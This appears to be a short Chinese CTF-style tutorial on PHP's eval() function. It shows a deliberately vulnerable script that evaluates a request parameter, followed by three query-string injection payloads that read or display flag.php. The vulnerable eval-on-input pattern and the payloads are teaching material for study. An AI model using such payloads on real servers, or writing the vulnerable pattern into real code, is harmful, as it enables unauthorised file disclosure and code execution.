eval() 函数把字符串按照 PHP 代码来计算。
该字符串必须是合法的 PHP 代码,且必须以分号结尾。
如果没有在代码字符串中调用 return 语句,则返回 NULL。如果代码中存在解析错误,则 eval() 函数返回 false。
看一则样例
<?php
include "flag.php";
$a = @$_REQUEST['hello'];
eval( "var_dump($a);");
show_source (__FILE__);
?>
------------------------
include “flag.php”: include 语句包含并运行指定文件。
$_REQUEST[‘hello’]: 通过 GET,POST 和 COOKIE 传递参数
var_dump($a) : 输出变量的相关信息
eval(): 把字符串当作命令直接执行
show_source() : 函数对文件进行语法高亮显示。
FILE: 当前文件
--------------------
方法一
?hello=1);print_r(file(%22./flag.php%22));//
相当于:eval( “var_dump(1);print_r(file(”./flag.php"));//);");
eval函数将引号内的字符串作为语句运行,所以//仅注释);
方法二
?hello=file('flag.php')
file() 函数把整个文件读入一个数组中。(注意参数是字符串)
方法三
?hello=1);show_source(%27flag.php%27);var_dump(
先提亮,然后输出